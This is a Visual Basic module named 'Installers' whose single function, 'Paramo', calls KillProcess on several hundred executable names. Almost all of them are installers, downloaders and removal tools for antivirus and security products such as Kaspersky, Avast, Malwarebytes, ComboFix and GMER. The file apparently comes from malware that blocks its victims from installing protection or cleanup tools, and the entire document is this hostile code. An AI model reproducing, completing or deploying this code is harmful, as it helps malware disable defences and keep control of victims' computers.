Attribute VB_Name = "Installers"
Function Paramo()
    Call KillProcess("BlitzBlank.exe")
    Call KillProcess("Emerald_1_0_128_McAfee_VirusScan_Plus_276_en-GB_30d_BN_112_OG_3055_User.exe")
    Call KillProcess("getsusp.exe")
    Call KillProcess("HitmanPro35.exe")
    Call KillProcess("NIS_19.1.1.3_SYMTB_SOFTONIC_LOEM_MRFTT_286A_6738.exe")
    Call KillProcess("PandaCloudAntivirus.exe")
    Call KillProcess("SoftonicDownloader_para_actualizacion-de-firmas-para-avg-free.exe")
    Call KillProcess("SoftonicDownloader_para_ad-aware-free-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_ad-aware-personal-security.exe")
    Call KillProcess("SoftonicDownloader_para_agnitum-outpost-security-suite.exe")
    Call KillProcess("SoftonicDownloader_para_anti-keylogger.exe")
    Call KillProcess("SoftonicDownloader_para_anti-malware-toolkit.exe")
    Call KillProcess("SoftonicDownloader_para_antirun.exe")
    Call KillProcess("SoftonicDownloader_para_anti-trojan.exe")
    Call KillProcess("SoftonicDownloader_para_anti-trojan-elite.exe")
    Call KillProcess("SoftonicDownloader_para_anti-trojan-shield.exe")
    Call KillProcess("ArcaSetup2012-EN-32bit.exe")
    Call KillProcess("Adaware_Installer.exe")
    Call KillProcess("drweb-700-win.exe")
    Call KillProcess("ravintfree11.exe")
    Call KillProcess("avast_free_antivirus_setup.exe")
    Call KillProcess("escw_100_sa_sfx.exe")
    Call KillProcess("Setup-ISM(server)_v4.0.20.exe")
    Call KillProcess("cfw_installer.exe")
    Call KillProcess("mseinstall.exe")
    Call KillProcess("PANDAAP12.exe")
    Call KillProcess("SecurityScan_Release.exe")
    Call KillProcess("avira-free-antivirus-es.exe")
    Call KillProcess("PANDAAP12.exe")
    Call KillProcess("cfw_installer.exe")
    Call KillProcess("avg_free_stb_all_2012_2180_cnet.exe")
    Call KillProcess("bitdefender_antivirusES_2012.exe")
    Call KillProcess("clamAVsetup.exe")
    Call KillProcess("F-SecureNetworkInstaller.exe")
    Call KillProcess("InternetSecuritySuiteInstall.exe")
    Call KillProcess("vipre.exe")
    Call KillProcess("SoftonicDownloader_para_appremover.exe")
    Call KillProcess("SoftonicDownloader_para_ashampoo-virus-quickscan-free.exe")
    Call KillProcess("SoftonicDownloader_para_a-squared-anti-malware.exe")
    Call KillProcess("SoftonicDownloader_para_autorun-eater.exe")
    Call KillProcess("SoftonicDownloader_para_avast-free-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_avast-pro-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_avast-vps-update.exe")
    Call KillProcess("SoftonicDownloader_para_avg-anti-malware.exe")
    Call KillProcess("SoftonicDownloader_para_avg-anti-spyware.exe")
    Call KillProcess("SoftonicDownloader_para_avg-anti-virus.exe")
    Call KillProcess("SoftonicDownloader_para_avg-anti-virus-free.exe")
    Call KillProcess("SoftonicDownloader_para_avg-antivirus-plus-firewall.exe")
    Call KillProcess("SoftonicDownloader_para_avg-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_avg-linkscanner.exe")
    Call KillProcess("SoftonicDownloader_para_avg-pc-tuneup.exe")
    Call KillProcess("SoftonicDownloader_para_avg-remover-2012.exe")
    Call KillProcess("SoftonicDownloader_para_avg-remover-2012-x64.exe")
    Call KillProcess("SoftonicDownloader_para_avg-rescue-cd.exe")
    Call KillProcess("SoftonicDownloader_para_avg-rescue-usb.exe")
    Call KillProcess("SoftonicDownloader_para_avira-antivir.exe")
    Call KillProcess("SoftonicDownloader_para_avira-antivir-rescue-system.exe")
    Call KillProcess("SoftonicDownloader_para_avira-antivirus-premium.exe")
    Call KillProcess("SoftonicDownloader_para_avira-antivir-vdf.exe")
    Call KillProcess("SoftonicDownloader_para_avira-free-antivirus-2012.exe")
    Call KillProcess("SoftonicDownloader_para_avira-premium-security-suite.exe")
    Call KillProcess("SoftonicDownloader_para_avz-antiviral-toolkit.exe")
    Call KillProcess("SoftonicDownloader_para_bitdefender-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_bitdefender-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_bitdefender-rescue-cd.exe")
    Call KillProcess("SoftonicDownloader_para_bitdefender-total-security.exe")
    Call KillProcess("SoftonicDownloader_para_bitdefender-usb-immunizer.exe")
    Call KillProcess("SoftonicDownloader_para_blaster-worm-removal-tool.exe")
    Call KillProcess("SoftonicDownloader_para_bodetect.exe")
    Call KillProcess("SoftonicDownloader_para_bullguard-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_ca-anti-virus-plus.exe")
    Call KillProcess("SoftonicDownloader_para_clamwin-portable.exe")
    Call KillProcess("SoftonicDownloader_para_per-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_polifix.exe")
    Call KillProcess("SoftonicDownloader_para_clean-virus-msn.exe")
    Call KillProcess("SoftonicDownloader_para_combofix.exe")
    Call KillProcess("SoftonicDownloader_para_comodo-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_comodo-cleaning-essentials.exe")
    Call KillProcess("SoftonicDownloader_para_comodo-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_coranti.exe")
    Call KillProcess("SoftonicDownloader_para_cyberdefenderfree.exe")
    Call KillProcess("SoftonicDownloader_para_destrozavirususb-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_digital-defender.exe")
    Call KillProcess("SoftonicDownloader_para_digital-patrol.exe")
    Call KillProcess("SoftonicDownloader_para_escan-anti-virus.exe")
    Call KillProcess("SoftonicDownloader_para_eset-nod32-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_eset-online-scanner.exe")
    Call KillProcess("SoftonicDownloader_para_eset-smart-security.exe")
    Call KillProcess("SoftonicDownloader_para_eset-sysinspector.exe")
    Call KillProcess("SoftonicDownloader_para_free-download-manager.exe")
    Call KillProcess("SoftonicDownloader_para_free-escan-antivirus-toolkit-utility.exe")
    Call KillProcess("SoftonicDownloader_para_free-usb-disk-security.exe")
    Call KillProcess("SoftonicDownloader_para_f-secure-anti-virus.exe")
    Call KillProcess("SoftonicDownloader_para_f-secure-blacklight-rootkit-eliminator.exe")
    Call KillProcess("SoftonicDownloader_para_g-data-antivirus-2012.exe")
    Call KillProcess("SoftonicDownloader_para_g-data-bootcd.exe")
    Call KillProcess("SoftonicDownloader_para_g-data-internetsecurity-2012.exe")
    Call KillProcess("SoftonicDownloader_para_gucup-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_herramienta-de-desinfeccion-contra-el-virus-sasser.exe")
    Call KillProcess("SoftonicDownloader_para_immunet-protect.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-anti-virus.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-anti-virus-for-windows-workstation.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-anti-virus-remover.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-free-cleaner.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-internet-security-2013-beta.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-pure.exe")
    Call KillProcess("SoftonicDownloader_para_norton-virus-definitions-update.exe")
    Call KillProcess("SoftonicDownloader_para_norton-removal-tool.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-rescue-disk.exe")
    Call KillProcess("SoftonicDownloader_para_opswat-malware-scanner.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-virus-removal-tool.exe")
    Call KillProcess("SoftonicDownloader_para_kaspersky-windowsunblocker.exe")
    Call KillProcess("SoftonicDownloader_para_livekill-clean-messenger.exe")
    Call KillProcess("SoftonicDownloader_para_malwarebytes-anti-malware.exe")
    Call KillProcess("SoftonicDownloader_para_orion-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_mcafee-avert-stinger.exe")
    Call KillProcess("SoftonicDownloader_para_panda-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_mcafee-consumer-products-removal-tool.exe")
    Call KillProcess("SoftonicDownloader_para_mcafee-superdat.exe")
    Call KillProcess("SoftonicDownloader_para_panda-cloud-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_panda-anti-rootkit.exe")
    Call KillProcess("SoftonicDownloader_para_norton-power-eraser.exe")
    Call KillProcess("SoftonicDownloader_para_panda-internet-security.exe")
    Call KillProcess("SoftonicDownloader_para_mcafee-virusscan-plus-aol-edition.exe")
    Call KillProcess("SoftonicDownloader_para_panda-usb-vaccine.exe")
    Call KillProcess("SoftonicDownloader_para_panda-internet-security-for-netbooks.exe")
    Call KillProcess("SoftonicDownloader_para_pc-tools-spyware-doctor-con-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_norton-antivirus-2012.exe")
    Call KillProcess("SoftonicDownloader_para_microsoft-security-essentials.exe")
    Call KillProcess("SoftonicDownloader_para_microsoft-security-essentials-beta.exe")
    Call KillProcess("SoftonicDownloader_para_microsoft-security-essentials-para-xp.exe")
    Call KillProcess("SoftonicDownloader_para_pc-tools-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_microsoft-security-essentials-x64.exe")
    Call KillProcess("SoftonicDownloader_para_microsoft-standalone-system-sweeper.exe")
    Call KillProcess("SoftonicDownloader_para_moon-secure-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_msncleaner.exe")
    Call KillProcess("SoftonicDownloader_para_norman-virus-control.exe")
    Call KillProcess("SoftonicDownloader_para_multi-virus-cleaner.exe")
    Call KillProcess("SoftonicDownloader_para_mx-one-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_nod32-antivirus-system.exe")
    Call KillProcess("SoftonicDownloader_para_norman-antivirus-and-antispyware.exe")
    Call KillProcess("SoftonicDownloader_para_rav-antivirus-desktop.exe")
    Call KillProcess("SoftonicDownloader_para_returnil-system-safe.exe")
    Call KillProcess("SoftonicDownloader_para_rising-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_roguekiller.exe")
    Call KillProcess("SoftonicDownloader_para_shardana-antivirus-rescue-disk-utility.exe")
    Call KillProcess("SoftonicDownloader_para_smart-installer-pack.exe")
    Call KillProcess("SoftonicDownloader_para_sophos-anti-rootkit.exe")
    Call KillProcess("SoftonicDownloader_para_sophos-anti-virus.exe")
    Call KillProcess("SoftonicDownloader_para_swift-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_system-mechanic.exe")
    Call KillProcess("SoftonicDownloader_para_trojan-remover.exe")
    Call KillProcess("SoftonicDownloader_para_trojanshield.exe")
    Call KillProcess("SoftonicDownloader_para_trustport-usb-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_twister-anti-trojanvirus.exe")
    Call KillProcess("SoftonicDownloader_para_ultimate-boot-cd.exe")
    Call KillProcess("SoftonicDownloader_para_usb-disk-security.exe")
    Call KillProcess("SoftonicDownloader_para_usb-doctor.exe")
    Call KillProcess("SoftonicDownloader_para_zillya.exe")
    Call KillProcess("SoftonicDownloader_para_vcleaner.exe")
    Call KillProcess("SoftonicDownloader_para_zenok-free-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_xboot.exe")
    Call KillProcess("SoftonicDownloader_para_vipre-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_virus-effect-remover.exe")
    Call KillProcess("SoftonicDownloader_para_web-security-guard.exe")
    Call KillProcess("SoftonicDownloader_para_windows-defender-offline.exe")
    Call KillProcess("SoftonicDownloader_para_winlockless.exe")
    Call KillProcess("SoftonicDownloader_para_zenok-free-antivirus.exe")
    Call KillProcess("SoftonicDownloader_para_zillya.exe")
    Call KillProcess("SoftonicDownloader_para_winzip.exe")
    Call KillProcess("SUPERAntiSpyware.exe")
    Call KillProcess("te782.exe")
    Call KillProcess("TrendMicro_TAV_US-en_dual.exe")
    Call KillProcess("TTi_3.0_EL_Full.exe")
    Call KillProcess("zaAvSetupWeb_101_079_000.exe")
    Call KillProcess("ESN_R_FUL_2012_TC.exe")
    Call KillProcess("G_Data_CloudSecurityES.exe")
    Call KillProcess("Gigaget.exe")
    Call KillProcess("HiddenFinderV1304T_setup.exe")
    Call KillProcess("mvirsobig.exe")
    Call KillProcess("myusbonly_setup.exe")
    Call KillProcess("pchotrial.exe")
    Call KillProcess("avast_pro_antivirus_setup.exe")
    Call KillProcess("avast_internet_security_setup.exe")
    Call KillProcess("mbam-setup-1.61.0.1400")
    Call KillProcess("issetup.exe")
    Call KillProcess("AIMFix.exe")
    Call KillProcess("AntiNimda.exe")
    Call KillProcess("CSAntiVirus.0.1.2.beta.exe")
    Call KillProcess("getright6.5-download.exe")
    Call KillProcess("SASDEFINITIONS.exe")
    Call KillProcess("unhackme_setup.exe")
    Call KillProcess("usbrunner.exe")
    Call KillProcess("av32evl.exe")
    Call KillProcess("avg_idpt_stf_all_85_406.exe")
    Call KillProcess("BlitzBlank.exe")
    Call KillProcess("DriveSentryDesktop3.4.0.20.exe")
    Call KillProcess("Norton_Removal_Tool_9x.exe")
    Call KillProcess("Rav_softonic.exe")
    Call KillProcess("tfinstall.exe")
    Call KillProcess("TTi_5.0_HE_Downloader_EWEB.exe")
    Call KillProcess("AntiSST.exe")
    Call KillProcess("a-squared Anti-Dialer.exe")
    Call KillProcess("BootMed.exe")
    Call KillProcess("CA Anti-Virus.exe")
    Call KillProcess("Disk Doctors Windows Data Recovery.exe")
    Call KillProcess("Dr.Web LinkChecker for Firefox.exe")
    Call KillProcess("Evil Radar Antivirus.exe")
    Call KillProcess("GAV.exe")
    Call KillProcess("iSergiwa Portable.exe")
    Call KillProcess("Kerio.exe")
    Call KillProcess("Norton Removal Tool.exe")
    Call KillProcess("Security Analyzer.exe")
    Call KillProcess("Trend Micro Sysclean.exe")
    Call KillProcess("Xleaner.exe")
    Call KillProcess("ZoneAlarm.exe")
    Call KillProcess("Anti-Nimda.exe")
    Call KillProcess("CA PC Tune-Up.exe")
    Call KillProcess("CleanCIH.exe")
    Call KillProcess("Hazard.exe")
    Call KillProcess("Little Intelligent.exe")
    Call KillProcess("Norton AntiBot.exe")
    Call KillProcess("RegRun Security Suite.exe")
    Call KillProcess("TinyWall.exe")
    Call KillProcess("USBCop.exe")
    Call KillProcess("AVTrojan.exe")
    Call KillProcess("BearFlix.exe")
    Call KillProcess("Download Statusbar.exe")
    Call KillProcess("Install ZIP.exe")
    Call KillProcess("Kaspersky.exe")
    Call KillProcess("KaZaA.exe")
    Call KillProcess("Macallan.exe")
    Call KillProcess("MindSoft.exe")
    Call KillProcess("Network.exe")
    Call KillProcess("Norton AntiBot.exe")
    Call KillProcess("Ocean.exe")
    Call KillProcess("RootKit Hook.exe")
    Call KillProcess("Pretty Park.exe")
    Call KillProcess("System Shield.exe")
    Call KillProcess("Tizer Rootkit.exe")
    Call KillProcess("TrustPort Internet Security.exe")
    Call KillProcess("VDriveAutorun.exe")
    Call KillProcess("Alt-N MDaemon.exe")
    Call KillProcess("AntiPharming.exe")
    Call KillProcess("Anti-SirCam.exe")
    Call KillProcess("AOL Active.exe")
    Call KillProcess("Archiver Shell.exe")
    Call KillProcess("GMER.exe")
    Call KillProcess("Norman Securitye.exe")
    Call KillProcess("RootRepeal.exe")
    Call KillProcess("Antibenjamin.exe")
    Call KillProcess("AntiKlez.exe")
    Call KillProcess("Attachment.exe")
    Call KillProcess("Jiangmin Antivirus.exe")
    Call KillProcess("Mamutu.exe")
    Call KillProcess("RAV4MSN.exe")
    Call KillProcess("StartupEye.exe")
    Call KillProcess("SWCLEAN.exe")
    Call KillProcess("TrustPort Total Protection.exe")
    Call KillProcess("VBA32 Antivirus.exe")
    Call KillProcess("WinPooch.exe")
    Call KillProcess("ZoneAlarm.exe")
    Call KillProcess("Avas.exe")
    Call KillProcess("Backbeat.exe")
    Call KillProcess("BitDefender.exe")
    Call KillProcess("EICAR Teste.exe")
    Call KillProcess("Free Klez Removal Utility.exe")
    Call KillProcess("Netkeys.exe")
    Call KillProcess("Quttera.exe")
    Call KillProcess("W32Swen.exe")
    Call KillProcess("Alligator.exe")
    Call KillProcess("AntiyGhostbusters.exe")
    Call KillProcess("Autorun3.exe")
    Call KillProcess("CA Internet Security.exe")
    Call KillProcess("Comodo Online.exe")
    Call KillProcess("Flecko.exe")
    Call KillProcess("I-Worm.Zafi.b & I-Worm.Bagle.exe")
    Call KillProcess("MYInternetSecurity.exe")
    Call KillProcess("Nicolás Ferreira.exe")
    Call KillProcess("a-squared Buscador.exe")
    Call KillProcess("ClamAVSOSDG.exe")
    Call KillProcess("PC Security.exe")
    Call KillProcess("SanityCheck.exe")
    Call KillProcess("SP AntivirusPlus.exe")
    Call KillProcess("Symantec.exe")
    Call KillProcess("HandyBits.exe")
    Call KillProcess("Virus Chaser.exe")
    Call KillProcess("DeBank.exe")
    Call KillProcess("Merak Mail Server.exe")
    Call KillProcess("Oolauncher.exe")
    Call KillProcess("Prayaya.exe")
    Call KillProcess("RAV4Trillian.exe")
    Call KillProcess("SpywareGuard.exe")
    Call KillProcess("StartRight.exe")
    Call KillProcess("Web The Ripper.exe")
End Function

